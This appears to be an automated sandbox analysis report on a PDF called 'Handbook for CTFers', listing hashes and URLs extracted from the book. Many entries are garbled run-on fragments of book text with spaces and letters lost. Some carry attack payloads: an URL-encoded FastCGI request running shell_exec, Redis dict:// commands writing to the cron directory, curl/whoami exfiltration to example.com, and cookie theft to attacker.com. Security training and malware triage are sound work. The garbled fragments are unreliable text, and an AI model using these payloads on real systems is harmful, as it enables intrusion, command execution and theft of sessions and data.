Behavioral task: behavioral1
Sample: Handbook for CTFers.pdf
Resource: win10v2004-20220414-es

General
Target: Handbook for CTFers.pdf
Size: 45.9MB
MD5: dce4c0016a80787727ebcdab463588a1
SHA1: 6311dc059260108666a33ddb7f81a4adcdca3bc5
SHA256: 6d855933bcf3b00943a7b4b214ef3cf75435bba766ad5d03468f71ff8056b4f7
SHA512: 00c62ad8efd8ba641d497b84acc88232cde776e1c22ce5200b6fd932cace06eae02a2eb5ec562bda30757eb38fabdb0855b8b99820cb5c242ae4d229ddd47c59
SSDEEP: 786432:vstWYWZmPuDWq48b2oJNh25vzx0QSyN2DpbPRr1ri+8VUWhq4VIy:vstWYWZmWKe7UHeLLG6Gay

Malware Config

Signatures

Files
Handbook for CTFers.pdf.pdf
-
https://doi.org/10.1007/978-981-19-0336-6
-
https://nu1l.com
-
https://ctftime.org/ctf/240
-
http://crossmark.crossref.org/dialog/?doi=10.1007/978-981-19-0336-6_1&domain=pdf
-
https://doi.org/10.1007/978-981-19-0336-6_1#DOI
-
https://github.com/denny0223/scrabble
-
https://github.com/WangYihang/GitHacker
-
https://github.com/kost/dvcs-ripper
-
https://github.com/maurosoria/dirsearch
-
http://192.168.20.133/sql1.php?id=2
-
https://github.com/Audi-1/sqli-labs
-
http://cnblogs.com/iamstudy/articles/2017_quanguo_ctf_web_writeup.html
-
http://crossmark.crossref.org/dialog/?doi=10.1007/978-981-19-0336-6_2&domain=pdf
-
https://doi.org/10.1007/978-981-19-0336-6_2#DOI
-
http://baidu.com
-
https://github.com/tarunkant/Gopherus
-
http://dwz.cn/11SMa
-
https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser.-In-Trending-Programming-Languages.pdf
-
https://github.com/n0b0dyCN/redis-rogue-server
-
http://www.baidu.com
-
https://github.com/opensec-cn/vtest
-
http://example.com
-
http://test.example.com
-
http://www.nu1l.com/exec/3.php?cmd=whoami%3etest
-
http://www.nu1l.com/
-
http://html5sec.org/
-
https://portswigger.net/blog/XSS-without-html-client-side-template-injection-with-angularjs%E3%80%82
-
http://window.name
-
https://developer.mozilla.org/zh-CN/docs/Web/HTTP/CSP
-
https://passport.example.com/v3/login/api/auth/?return_type=5&tpl=bp&u=http://qianbao.example.com
-
https://passport.example.com/v3/login/api/auth/?return_type=5&tpl=bp&u=xxxxxxxxxxxx://qianbao.example.com
-
https://passport.example.com/v3/login/api/auth/?return_type=5&tpl=bp&u=javascript:alert
-
http://www.yulegeyu.com/2019/06/18/Metinfo6-Arbitrary-File-Upload-Via-Iconv-Truncate
-
http://httpd.apache.org/docs/2.2/mod/directive-dict.html#Context
-
https://www.php.net/manual/zh/ini.list.php
-
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15715
-
http://aliyuncs.com
-
http://www.yulegeyu.com/2019/02/15/Some-vulnerabilities-in-JEECMSV9/
-
https://github.com/BlackFan/jpg_payload
-
https://hackmd.io/s/Hk-2nUb3Q
-
https://www.php.net/manual/zh/filters.string.php
-
http://crossmark.crossref.org/dialog/?doi=10.1007/978-981-19-0336-6_3&domain=pdf
-
https://doi.org/10.1007/978-981-19-0336-6_3#DOI
-
https://5haked.blogspot.jp/2016/10/how-i-hacked-pornhub-for-fun-and-profit.html?m=1
-
http://lucumr.pocoo.org/2016/12/29/careful-with-str-format/
-
https://docs.python.org/3/library.xml.html/
-
https://github.com/orangetw/My-CTF-Web-Challenges/tree/master/hitcon-ctf-2018/oh-my-raddit/src
-
https://github.com/shiltemann/CTF-writeups-public/blob/master/PicoCTF_2018/writeupfiles/server_noflag.py
-
http://converter.uni.hctf.fun/
-
https://github.com/pspaul/padding-oracle
-
https://github.com/CTFTraining/pwnhub_2017_open_weekday
-
https://github.com/bizonix/evalhook
-
https://github.com/CTFTraining/sctf_2018_
-
http://session.demo.com/
-
http://demo.meizj.com/pay.php?money=1000&purchaser=jack&productid=1001&seller=john
-
http://demo.meizj.com/
-
http://oauth.demo.com/main/oauth/?state=******
-
https://book-en.nu1l.com/
-
http://crossmark.crossref.org/dialog/?doi=10.1007/978-981-19-0336-6_4&domain=pdf
-
https://doi.org/10.1007/978-981-19-0336-6_4#DOI
-
https://bbs.pediy.com/thread-246117-1.htm
-
http://crossmark.crossref.org/dialog/?doi=10.1007/978-981-19-0336-6_5&domain=pdf
-
https://doi.org/10.1007/978-981-19-0336-6_5#DOI
-
http://crossmark.crossref.org/dialog/?doi=10.1007/978-981-19-0336-6_6&domain=pdf
-
https://doi.org/10.1007/978-981-19-0336-6_6#DOI
-
https://wenku.baidu.com/view/afec9dd1d15abe23482f4d70.html
-
http://ddebs.ubuntu.com/
-
http://crossmark.crossref.org/dialog/?doi=10.1007/978-981-19-0336-6_7&domain=pdf
-
https://wikipedia.org/
-
https://doi.org/10.1007/978-981-19-0336-6_7#DOI
-
https://atomcated.github.io/Vigenere/
-
https://github.com/Ciphey/Ciphey
-
https://gchq.github.io/CyberChef/
-
https://github.com/veritas501/attachment_in_blog/tree/master/Gadgetzan
-
https://github.com/pablocelayes/rsa-wiener-attack
-
https://github.com/mimoo/RSA-and-LLL-attacks
-
https://github.com/Ganapati/RsaCtfTool
-
https://github.com/bwall/HashPump
-
https://github.com/blockstack/secret-sharing
-
http://crossmark.crossref.org/dialog/?doi=10.1007/978-981-19-0336-6_8&domain=pdf
-
https://doi.org/10.1007/978-981-19-0336-6_8#DOI
-
https://remix.ethereum.org
-
https://ropsten.etherscan.io
-
https://github.com/ethereum/go-ethereum
-
https://infura.io/
-
https://github.com/ethereum/wiki/wiki/JSON-RPC
-
https://ropsten.etherscan.io/address/0x7caa18d765e5b4c3bf0831137923841fe3e7258a
-
https://github.com/yuange1024/ethereum_yellowpaper
-
https://github.com/Hcamael/ethre_source/blob/master/hctf2018.sol
-
http://crossmark.crossref.org/dialog/?doi=10.1007/978-981-19-0336-6_9&domain=pdf
-
https://doi.org/10.1007/978-981-19-0336-6_9#DOI
-
http://www.fifi.org/doc/jhead/exif-e.html
-
https://github.com/zed-0xff/zsteg
-
https://github.com/chishaxie/BlindWaterMark
-
https://www.wireshark.org/
-
https://www.wireshark.org/docs/man-pages/tshark.html
-
https://www.usb.org/sites/default/files/documents/hut1_12v2.pdf
-
https://usb.org/sites/default/files/.documents/hid1_11.pdf
-
https://github.com/superponible/volatility-plugins
-
http://crossmark.crossref.org/dialog/?doi=10.1007/978-981-19-0336-6_10&domain=pdf
-
https://doi.org/10.1007/978-981-19-0336-6_10#DOI
-
https://xdebug.org/download.php
-
http://49.4.78.51:32310/flag
-
http://crossmark.crossref.org/dialog/?doi=10.1007/978-981-19-0336-6_11&domain=pdf
-
https://doi.org/10.1007/978-981-19-0336-6_11#DOI
-
https://github.com/wupco/weblogger
-
https://github.com/MaskRay/pcap-search
-
http://crossmark.crossref.org/dialog/?doi=10.1007/978-981-19-0336-6_12&domain=pdf
-
https://doi.org/10.1007/978-981-19-0336-6_12#DOI
-
http://nmap.org/book/inst-source.html
-
https://pentestbox.org/zh/
-
https://github.com/Dliv3/Venom
-
https://github.com/Dliv3/Venom/releases/download/v1.0.2/Venom.v1.0.2.7z
-
https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/
-
https://github.com/SecureAuthCorp/impacket
-
https://github.com/worawit/MS17-010
-
https://docs.microsoft.com/en-us/sysinternals/downloads/autologon
-
https://docs.microsoft.com/
-
https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1
-
https://github.com/samratashok/nishang/blob/master/Gather/Copy-VSS.ps1
-
http://scanf.com
-
http://www.pwnag3.com/2014/05/what-did-microsoft-just-break-with.html
-
https://github.com/gentilkiwi/mimikatz/wiki/module-~-kerberos
-
https://adsecurity.org/?p=2011
-
https://adsecurity.org/?p=1640
-
https://doi.org/10.1007/978-981-19-0336-6Jointlypublishedwith,PublishingHouseofElectronicsIndustry,Beijing,P.R.ChinaTheprinteditionisnotforsaleinChina
-
https://doi.org/10.1007/978-981-19-0336-6_11
-
http://pythonGitHacker.py
-
http://readme.md
-
http://www.zip/rar/tar.gz:oftenthesourcecodesofawebsite.4.PersonalexperienceSomechallengemaintainersmodifytheirchallengelesonlineduringCTFonlinecompetitions,andSWPbackuplesaregeneratedduetovim�sfeature.Thusplayerscouldunintentionallygetsourcecodesorsensitivemessages.Fig.1.8ResultFig.1.9Getag81IntroductiontotheWeb
-
http://google.zip
-
http://2021-7-1.zip
-
http://WebPage.new
-
https://wwwcnblogs.com/iamstudy/articles/2017_quanguo_ctf_web_writeup.htmlforthewriteups
-
http://views.IndexView.as
-
http://views.LoginView.as
-
http://views.LogoutView.as
-
http://views.StaticFilesView.as
-
http://headimg.do
-
http://url.open
-
http://upug.to
-
http://utils.md
-
http://myURL.host
-
http://blog.loli.network
-
http://untar.py/tmp/pwnhub/'.$name
-
http://le.open
-
http://le.is
-
http://cron_run.sh
-
http://21cn.com
-
http://smtp.21cn.com
-
http://le.fromds_storeimportDSStorewithDSStore.open
-
http://router.post
-
http://req.body.ua
-
http://r.data
-
https://hackmd.io
-
http://ctx.query.ua
-
http://returnaxios.post
-
http://....e.data
-
http://t.data
-
https://hackmd.io/aaacreateacontainerdockercreate-v/ag:/agindockeralpine--entrypoint
-
https://hackmd.io/aaaStartthecontainerdockerstartctf:url[method]=post&url[url]=http://127.0.0.1/containers/ctf/start&url[socketPath]=/var/run/docker.sock&url=https://hackmd.io/aaaRetrievetheagleinthedocker.url[method]=get&url[url]=http://127.0.0.1/containers/ctf/archive?path=/agindocker&url[socketPath]=/var/run/docker.sock&url=https://hackmd.io/aaa741IntroductiontotheWeb
-
http://52dandan.cc/public_html/cong.php
-
http://php...de
-
http://52dandan.com/public_html/youwillneverknowthisle_e2cd3614b63ccdcbfe7c8f07376fe431'
-
https://doi.org/10.1007/978-981-19-0336-6_283
-
http://suchasbaidu.com
-
http://example.com/?url=http://%s:%s'%
-
http://gist.github.com/phith0n/9615e2420f31048f7e30f3937356cf75YouneedtoknowtheabsolutepathofaPHPleontheserverbecauseitisdeterminedtoincludewhethertheleexistsornotandthesecurity.limit_extensionscongurationitemmustbefollowedby.php.Generally,youcanusethedefault/var/www/html/index.php.Ifyoucannotknowthewebdirectory,youcanseethelistoflesinthedefaultPHPinstallation.SeeFig.2.12.TheresultsoftheattackusingExploitareshowninFig.2.13.Usenctolistenonaportandgetattacktrafc.SeeFig.2.14.URL-encodingthedatathereinyields.%01%01%03%EF%00%08%00%00%00%00%01%00%00%00%00%00%00%00%00%01%04%03%EF%01%E7%00%00%0E%02CONTENT_LENGTH410C%10CONTENT_TYPEapplication/text%0B%04REMOTE_PORT9985%0B%09SERVER_NAMElocalhost%11%0BGATEWAY_interfacefastCGI/1.0%0F%0ESERVER_SOFTWAREphp/fcgiclient%0B%09REMOTE_ADDR127.0.0.1%0F%1BSCRIPT_FILENAME/usr/local/lib/php/PEAR.php%0B%1BSCRIPT_NAME/usr/local/lib/php/PEAR.php%09%1FPHP_VALUEauto_prepend_le%20%3D%20php%3A//input%0E%04REQUEST_METHODPOST%0B%02SERVER_PORT80%0F%08SERVER_PROTOCOLHTTP/1.1%0C%00QUERY_STRING%0F%16PHP_ADMIN_VALUEallow_url_include%20%3D%20On%0D%01DOCUMENT_ROOT/%0B%09SERVER_ADDR127.0.0.1%0B%1BREQUEST_URI/usr/local/lib/php/PEAR.php%01%04%03%EF%00%00%00%00%01%05%03%EF%00%29%00%00%3C%3Fphp%20var_dump%28shell_exec%28%27uname%20-a%27%29%29%3B%3F%3E%01%05%03%EF%00%00%00%00%00%00942AdvancedWeb
-
https://github.com/tarunkant/Gopherus,isshowninFig.2.18.2.1.4SSRFBypassingSSRFalsohassomeWAFbypassscenarios,whichwillbebrieyanalyzedinthissection.2.1.4.1IPRestrictionsUseEnclosedalphanumericsinsteadofnumbersintheIPorlettersintheURL
-
http://suchas127.0.0.1.xip.io
-
http://dwz.cn/11SMa,seeFig.2.26.Sometimestheservermayltermanyprotocols.Forexample,only�http�or�https�isallowedintheincomingURL,soyoucanwritea302redirectiononyourserverandusetheGopherprotocoltoattacktheintranet.Redis,seeFig.2.27.Fig.2.21BypassresultFig.2.22Bypassresult1002AdvancedWeb
-
http://parse_urlgetthehostisbaidu.com
-
https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser.-In-Trending-Programming-Languages.pdf.2.1.4.4DNSRebindingInsomecases,lteringforSSRFmayoccurasfollows:thehostisextractedfromtheincomingURL,thenDNSresolutionisperformed,theIPaddressisobtained,theIPaddressischeckedtoseeifitislegitimate,andifitpasses,thenthecurlisrequestedagain.IftheDNSresolutionoftherstrequestreturnsanormaladdress,buttheDNSresolutionofthesecondrequestreturnsamaliciousaddress,thentheDNSrebindingattackiscomplete.Fig.2.28Getag1042AdvancedWeb
-
http://reactor.run
-
http://www.x.cn:6379/cong:set:dir:/var/spool/cron/54.223.247.98:2222/tools.php?a=s&u=dict://www.x.cn:6379/cong:set:dblename:root54.223.247.98:2222/tools.php?a=s&u=dict://www.x.cn:6379/set:0:
-
http://www.x.cn:6379/saveTheresultsoftheattackareshowninFig.2.32.2.Guardnetcup2019easy_pythonTherewasachallengeonSSRFattacksonRedisinthe2019NetProtectionCup.Wereplayedthetopicafterthegameandanalyzeditasanexample.Fig.2.31phpinfo2.1SSRFVulnerabilities107
-
http://self.req.post
-
http://exp.do
-
https://github.com/n0b0dyCN/redis-rogue-server.Here,becauseofthetriggerpoints,itisimpossibletoruntheprocessprovidedbyexpabovestrictly.First,settheVPSslaveintheshell,thensetdblenametoexp.so,andperformthersttwostepsinexpmanually,asshowninFig.2.39.Then,removeallthefunctionsbehindtheloadmoduleandrunexpontheVPS.Finally,performtherestofthestepsmanuallyonRedisandreadtheagsusingthefunctionsprovidedbytheextension,seeFig.2.40.Fig.2.38Needtoperformapower-upFig.2.39Executionprocess2.1SSRFVulnerabilities111
-
http://1andwww.baidu.com
-
http://curlwww.vps.com
-
http://le.cat
-
http://standsforanystring.cat/tm?/*
-
https://github.com/opensec-cn/vtestfortesting.Afterbuildingit,starttestingitwiththefollowingtestcode.
-
http://1.HTTPchannelsAssumingyourdomainnameisexample.com
-
http://example.com/httplog/%xTheresultofechohelloexecutionissavedinthe%xvariablewiththeforcommandandthensplicedintotheURL.Aftertheabovecommandisexecuted,thesystem�sdefaultbrowserwillbecalledtoopenandaccessthespeciedwebsite,andeventually,theresultsoftheechohellocommandwillbeavailableontheplatform,seeFig.2.54.However,thedrawbackisthatthebrowserdoesnotclosewhenyoucallit,andthereisatruncationproblemwhenspecialcharactersorspacesareencountered,soyoucanborrowPowershellforextraneousdata.InPowershell2.0,executethefollowingcommand.for/F%xin
-
http://example.com/httplog/'+$a
-
http://totakeoutdata.Example.curlexample.com/`whoami`wgetexample.com/$
-
http://ping-nc1test.example.com
-
http://.UnderLinux.ping
-
http://.example.com
-
http://i.xxx.example.com
-
http://www.nu1l.com/exec/3.php?cmd�whoami
-
http://www.nu1l.com/again.exec/testtogettheresult,seeFig.2.56.2.2.3Real-lifeCommandExecutionChallengesandAnswersItisraretotestonlycommandinjectionchallengesinCTFcompetitions,buttheyareusuallycombinedintoothermoretechnicalchallenges,suchasdenylistbypass,Linuxwildcard,etc.Thefollowingaresomeclassicchallenges.2.2.3.12015HITCONBabyFirstThePHPcodeisasfollows.
-
http://limitingthecommandlengthtolessthanorequalto4.ls
-
http://leare.ls
-
http://attacker.com/a.js
-
http://attacker.com/1.html
-
http://html5sec.org/�.The�on�eventtriggerofmanytagsrequiresinteraction,suchasmouseoverandclick,thecodeisasfollows:
-
http://le.org/angular.js/1.4.6/angular.min.js
-
https://portswigger.net/blog/XSS-without-html-client-side-template-injection-with-angularjsFig.2.77Result1362AdvancedWeb
-
http://nu1l.com/?name=
-
https://developer.mozilla.org/zh-CN/docs/Web/HTTP/CSPtointroduceCSP.CSP
-
http://.baidu.com
-
http://attacker.com/?cookie=xxxx
-
http://attacker.com/?c=
-
http://admin.government.vip:8000
-
http://admin.government.vip:8000/uploadinterfaceasanadministratortogettheag.
-
http://admin.government.vip:8000/hasltering,andmanyfunctionshavebeendeleted.Youneedtondawaytobypassitinordertotransmitthedata.Thelteringpartisasfollows:deletewindow.Function;deletewindow.eval;deletewindow.alert;Fig.2.90Taskpage2.3TheMagicofXSS145
-
http://deletewindow.post
-
http://date.to
-
http://government.vip
-
http://admin.government.vip:8000/';document.body.appendChild
-
https://passport.example.com/v3/login/api/auth/?return_type�5&tpl�bp&u�http://qianbao.example.comThecompany�scross-domainauthorizationURListheaboveURL,whichhasmultipleparameters:returntypereferstotheauthorizationtypethatcanbe302jumporform;�tpl�parameterreferstothespecicservicethatjumpedtothistime,thisistheabbreviationoftheservicename;theuparameteristheauthorizationURLcorrespondingtothisservice.Aftertesting,itisfoundthatthe302jumpisdirectlyredirectedtothesubdomainwiththepass302;theformreturnsanautomaticallysubmittedformandtheactionisthesubdomain,andtheparameteristheauthenticationparameter.Thistimetheproblemliesintheformjump.Asmentionedabove,thedomainvericationintheuparameterisverystrict,buttheprotocolnamevericationisnotstrict.Forexample:https://passport.example.com/v3/login/api/auth/?return_type�5&tpl�bp&u�xxxxxxxxxxxx://qianbao.example.comSuchaprotocolnamecanreturntheresponseheadercorrectly,butitisthelinkthat302jumpsover.IfitisnotalegalHTTP
-
https://passport.example.com/v3/login/api/auth/?return_type�5&tpl�bp&u�javascript:alert
-
http://www.example.com/%250aalert
-
https://wappass.example.com/v3/login/api/auth/?return_type=4&tpl=bp&u=javascript%3A//example.com/%250aeval
-
https://apps.xxxx.com/libs/jquery/2.1.4/jquery.min.js
-
https://xss.attack.com/xxx/attack.php?sign=
-
https://wappass.example.com/wp/?qrlogin&t=1526233652&error=0&sign=
-
https://wappass.example.com/wp/?qrlogin&v=1526234914892
-
http://www.yulegeyu.com/2019/06/18/Metinfo6-Arbitrary-File-Upload-Via-Iconv-Truncate2.4.3FileSufxBlacklistVericationBypassFilesufxblacklistvericationistocreateablacklistofsufxes,checkwhetherthelesufxesareintheblacklistwhenuploading,donothingintheblacklist,anduploadthemiftheyarenot,soastorealizethelteringofuploadedles.2.4.3.1UploadFileRenameThetestcodeisshowninFig.2.105.Inthelenamerenamingscenario,onlythelesufxiscontrollable.Usuallyusesomemorepartiallesufxesthatcanbeparsedtobypasstheblacklistrestriction.ThecommonexecutablesufxesofPHPare�php3�,�php5�,�phtml�,�pht�,etc.ThecommonexecutablesufxesofASPare�cdx�,�cer�,�asa�,etc.AndJSPcantry�jspx�.SeeFig.2.106,whentheuploadedPHPlesisrestricted,youcanbypassitbyuploading�PHTML�les,asshowninFigs.2.107and2.108.Fig.2.103PHPcodeFig.2.104Result2.4FileUploadVulnerability157
-
http://a.ph
-
http://httpd.apache.org/docs/2.2/mod/directive-dict.html#Context.Whentheversionislowerthan2.3.8,becausethedefault�AllowOverride�is�All�,youcantrytouploadthe�.htaccess�letomodifypartoftheconguration,andusethe�SetHandler�tomakephpparsethespeciedle,asshowninFig.2.109.First,uploadthe�.htaccess�leandcongurethe�Files�directivetomakePHPparsethe�yu.txt�le,asshowninFig.2.110.Second,uploadthe�yu.txt�letothecurrentdirectory,atthistime�yu.txt�hasbeenparsedasaPHPle.Fig.2.109Thecontentof.htaccessFig.2.110Result2.4FileUploadVulnerability159
-
https://www.php.net/manual/zh/ini.list.php.Therearetwospecialcongurationsin�PHP_INI_PERDIR�mode:�auto_append_le�and�auto_prepend_le�.Theroleof�auto_prepend_le�istospecifyaletobeparsedbeforethemainleisparsed,andtheroleof�auto_append_le�istospecifyaletobeparsedafterthemainleisparsed,asshowninFig.2.112.Fig.2.111CongurationinPHP1602AdvancedWeb
-
http://x.php.xxx
-
https://cve.mitre.org/cgi-bin/cvename.cgi?name�CVE-2017-15715.AccordingtothedescriptionoftheCVE,itcanbeseenthatintheHTTPD2.4.0to2.4.29version,inthe�FilesMatch�directive,the�$�intheregularpatterncanmatchthenewlinecharacter,whichmaycausetheblacklisttobebypassed.
-
http://www.yulegeyu.com/2019/02/15/Some-vulnerabilities-in-JEECMSV9/2.4.5.4SomeWebCongurationsThatCanBeBypassedUsuallytheuploaddirectoryisconguredinthewebservertoprohibitleexecu-tion,anditmaybebypassedinthecaseofimproperconguration.1.Bypasscausedby�pathinfo�ThecongurationofNginxisasfollows:Fig.2.125PHPcodeFig.2.126ResultFig.2.127Result1682AdvancedWeb
-
http://yu.php.aaa
-
https://example.com/image.jpg
-
https://github.com/BlackFan/jpg_payload.ThetestcodeisshowninFig.2.137.First,uploadthenormalimagele,thendownloadtherenderedimage,run�jpg_payload.php�toprocessthedownloadedimage,injectthecodeintotheimagele,anduploadthenewlygeneratedimage.Youcanseethescriptcodeinjectedafter�imagecreatefromjpeg�stillexists,seeFig.2.138.2.4.7ExploitwithUploadtheGeneratedTemporaryFilePHPwillgeneratetemporarylesduringleupload,anddeletestemporarylesafteruploaded.Whenthereisalocalleinclusionvulnerabilitybuttheuploadfunctionisnotfoundandthereisnoletoinclude,youcantrytoincludethetemporarylegeneratedbytheuploadtocooperatewithit.Fig.2.137PHPcodeFig.2.138Executionprocess1742AdvancedWeb
-
http://session.upload_progress.name
-
https://hackmd.io/s/Hk-2nUb3Q.Fig.2.140Executionprocess1762AdvancedWeb
-
http://st.st
-
https://www.php.net/manual/zh/lters.string.php
-
http://sothemethodwillreturnfalse.is
-
https://doi.org/10.1007/978-981-19-0336-6_3195
-
http://www.nu1l.com:5555
-
https://5haked.blogspot.jp/2016/10/how-i-hacked-pornhub-for-Fig.3.8Result2023AdvancedWebChallenges
-
http://whichwasfurtherexplored.in
-
http://etc.to
-
http://belongtotheglobalmodule__builtins__.soyoucantry__builtins__.open
-
http://del__builtins__.open
-
http://__builtins__.open
-
http://lucumr.pocoo.org/2016/12/29/careful-with-str-format/3.2SecurityIssuesinPython219
-
http://self.id
-
http://Trueapp.run
-
http://weusethenccommandtolistenontheporttoseethedatareceivedontheport.nc
-
https://docs.python.org/3/library.xml.html/.ThefollowingcodecontainstwocommonpayloadsforXXEattack,oneforreadinglesandtheotherforprobingtheintranet,andthenparsingtheXMLthereinviaPython.Thecodeitselfdoesnotrestricttheexternalentities,whichleadstoXXEvulnerabilities.#coding=utf-8importxml.saxx=
-
http://xxx.xxx.xxx.xxx/?data=%le;'
-
http://arandom.py
-
http://srandom.py
-
http://nowu.save
-
https://github.com/orangetw/My-CTF-Web-Challenges/tree/master/hitcon-ctf-2018/oh-my-raddit/src.Accordingtothehint,agishitcon{ENCRYPTION_KEY},andweknowthatitisacombinationofpasswordandWeb;lookingatthehintinterface,itsays:assertENCRYPTION_KEY.islower
-
http://DES.new
-
http://app.py
-
https://github.com/shiltemann/CTF-writeups-public/blob/master/PicoCTF_2018/writeuples/server_noag.py.Underthe/agroute,theagisdisplayedtothepageonlyiftheAES-encryptedJSONstringstoredinthecookieisfetchedandtheadmineldis1.@app.route
-
http://Random.new
-
http://AES.new
-
http://converter.uni.hctf.fun/,whosemainfunctionistoenterastringfortheuserandconvertthedocumentinthatformattoanotherformatviatheserver'sconverter.NoteFig.3.40Paddingresult2403AdvancedWebChallenges
-
https://github.com/pspaul/padding-oracle.Withthehelpofit,youonlyneedtomodifyasmallpieceofcodetoimplementallthefeatures.Thecodeforthischallengeisasfollows:frompadding_oracleimportPaddingOraclefromoptimized_alphabetsimportjson_alphabetimportrequestsdeforacle
-
http://converter.uni.hctf.fun/convert',headers=headers
-
https://github.com/jbzteam/CTF/tree/master/BackdoorCTF2017
-
http://requests.post
-
https://extend-me-please.herokuapp.com/login',data=post,cookies=cookies
-
http://suchas.pyinPython.Pythoncompiles.py
-
http://ledownloadlimitsthatthe.py
-
https://github.com/CTFTraining/pwnhub_2017_open_weekday.ThechallengeprovidesabackupleprocessedbyPHPJiami,andyoucandownloadtheencryptedcodedirectly,asshowninFig.3.58.Therearealotofevalhookingplug-insourcecodeontheInternet,suchashttps://github.com/bizonix/evalhook,onlyneedtocompileandloadtothePHP,thenruntheencryptedcode,youcangetthedecryptedones,asshowninFig.3.59.Inadditiontocodeobfuscationinthisway,usingplug-instoencryptcodeisanotherwaytodoit.ThismethodhooksPHP'sunderlyingzend_compile_*,decryptsthesourcecodeinthefunctionafterthehook,andpassesthedecryptedsourcecodetothePHPexecutable.Forthistypeofencryption,wecanstilldecryptitinamannersimilartoevalhook.Fig.3.58TheencryptedcodedirectlyFig.3.59Thesourcecode2563AdvancedWebChallenges
-
https://github.com/CTFTraining/sctf_2018_babysyc.git.Bydownloadingtheindex.phpviaaarbitraryledownloadvulnerability,wefountitisencrypted.Bythecontentofphpinfo.php,weknowthattheserverhasapluginnamedencrypt_php,sowecandownloaditinthespeciedplug-indirectory.Analyzetheencryptionplug-in,whichhooksthezend_compile_le,asshowninFig.3.60.Lookagainatthelogicintheencrypt_compile_le.Attheendofthefunctionexecution,theencryptordirectlysendsthedecryptedresultbacktotheoriginalzend_compile_le,asshowninFig.3.61.Youcanprintthedecryptedcodebysimplychangingthepositionofthehookplug-insothatthehookfunctioniscalledafterthedecryptionfunction,asshowninFig.3.62.AnotherwaytoencryptistoencryptthecompiledOpcodes.Monitoringzend_compile_*willhavenoeffectbecausetheencryptionwon�tbecompiledinFig.3.60Analyzetheencryptionplug-in,whichhooksthezend_compile_leFig.3.61Process3.3CryptographyandReverseKnowledge257
-
http://session.demo.com/login.php?sessionId�xxxx;victimBexecutesAfterloggingin,thesessionIDcorrespondingtoSwillcontaintheidentifyinginformationofuserB.TheattackercanalsouseStogainaccesstothevictim'saccount.2.Data-relatedlogicalawsInreality,fortheshoppingsystemwithinterwovenbusinessfunctions,normalbusinessfunctionswillinvolveavarietyofscenarios,suchascommoditybalance,moneyexpenditure,commodityattributiondetermination,ordermodication,useofvouchers,etc.Purchaseofthesefunctions,forexample,intheprocessofbuyinginvolvesmerchantsbalancechangesofcommodity,thebuyeroftheamountofconsumption,suchasservertransactionhistorydata,becauseinvolvesmoretypesofdata,sointheactualdevelopmentprocess,forsomeofthedatatypeofthepossibilityofill-consideredcheckthen,suchascostamountistheamountofpositiveandnegativedecision,ifwecanchangeandotherissues.Theseproblemsareoftennotdirectlycausedbybugsatthecodelevel,butratherbyapartialfailureFig.3.69CookiesFig.3.70Cookies2643AdvancedWebChallenges
-
http://demo.meizj.com/pay.php?money�1000&purchaser�jack&productid�1001&seller�john.Theparametershavethefollowingmeanings:Moneyrepresentstheamountspentinthepurchase,Thepurchasers�username,Productidrepresentsthepurchaseinformation,andSellerrepresentstheseller�susername.IfthebackendpurchasefunctionisimplementedthroughthisURL,thenthebusinesslogiccanbedescribedas�purchaserspentmoneytobuytheproductidproductfromseller�.Whenthetransactioniscompletednormally,themoneyisFig.3.71Thevericationprocess3.4LogicFlaws265
-
http://demo.meizj.com/pay.php?money�1&purchaser�jack&productid�1001&seller�john.Atthispoint,theattackercompletesthepurchaseprocesswithonly1yuan.Thisisessentiallybecausethebackenddoesnotverifythetypeandformatofthedataeffectively,resultinginunexpectedsituations.Therefore,intheauthor�sopinion,data-relatedlogicvulnerabilitiesarebasicallycausedbyerrorsandomissionsindataverication.3.4.2LogicFlawsinCTFsComparedwithotherWebaws,logicawsusuallyrequirethecombinationofmultiplebusinessfunctionvulnerabilities.Therefore,theyoftenexistincomplexFig.3.72Theattackprocess2663AdvancedWebChallenges
-
http://oauth.demo.com/main/oauth/?state�******.Afteraccessingthelink,theOAuthaccountwillbeautomaticallyboundtoaregularaccount.ThekeyisthatordinaryuserscancompletethebindingofordinaryaccountandOAuthaccountbyaccessingthelinkwithToken.Similarly,theadministratorcanaccessthelinktocompletetheaccountbinding.Thearbitraryaddressskippingvulnerabilitycanbeusedtodeployanaddressskippingpageontheremoteserver.TheskippingaddressisthelinkboundwithToken.Whentheadministratoraccessesthesubmittedlink,itisrstredirectedtotheremoteserverandthenredirectedtothebindingpagetocompletethebindingbetweentheOAuthaccountandtheadminis-tratoraccount.Atthispoint,usetheOAuthaccounttoquicklylogintotheadministratoraccount.3.4.3SummaryofLogicalFlawsIncontrasttothevariousWebvulnerabilitiesmentionedearlier,thereisnoxedformatforpresentinglogicalvulnerabilities.Toexploitlogicholes,participantsneedtohaveagoodunderstandingofbusinessprocesses.Logicalvulnerabilityminingintherealenvironmentalsoneedstoconsideravarietyofauthenticationmethodsanddifferentbusinesslines,whicharenotdiscussedhere,readerscanndthefunintheirdailyworkandlife.3.5SummaryIngeneral,WebchallengesweretheeasiesttogetstartedinalldirectionsintheCTFcompetition.ThebookdividesthemainvulnerabilitiesinvolvedinWebtopicsintothreelevels:�gettingstarted�,�advanced�and�expanded�,eachwithonechapter,allowingreaderstostepbystep.However,becausetheclassicationofWebvulnerabilitiesisverycomplexandcomplicated,andtechnologyupdatesarefasterthanothertypesoftopics,readersareexpectedtosupplementrelevantknowledgewhilereadingthisbook,sothattheycanlearnfromoneanotherandimprovetheirownability.Fortherelevantcontentofthisbook,readerscanndcorrespondingsupportingexamplestopracticeontheN1BOOK
-
https://book-en.nu1l.com
-
https://doi.org/10.1007/978-981-19-0336-6_4269
-
http://schemas.android.com/apk/res/android
-
http://com.android.server.pm
-
http://andxposedminversionistheminimumversionoftheXposedFrameworkrequired.Fig.4.11ChoosetheapplicationtobedebuggedFig.4.12Choosethe.so
-
http://libc.so
-
http://Memory.read
-
http://elds__.map
-
http://libnative-lib.so
-
http://android.app
-
http://Usethefunctionandroid.os.Debug.is
-
http://androidxref.com/8.1.0_r33/xref/art/runtime/dex_le.cc#OpenCommon----------------------------------------------------------------------------------------Interceptor.attach
-
http://libart.so
-
http://com.xxx.xxx
-
http://dex_size.to
-
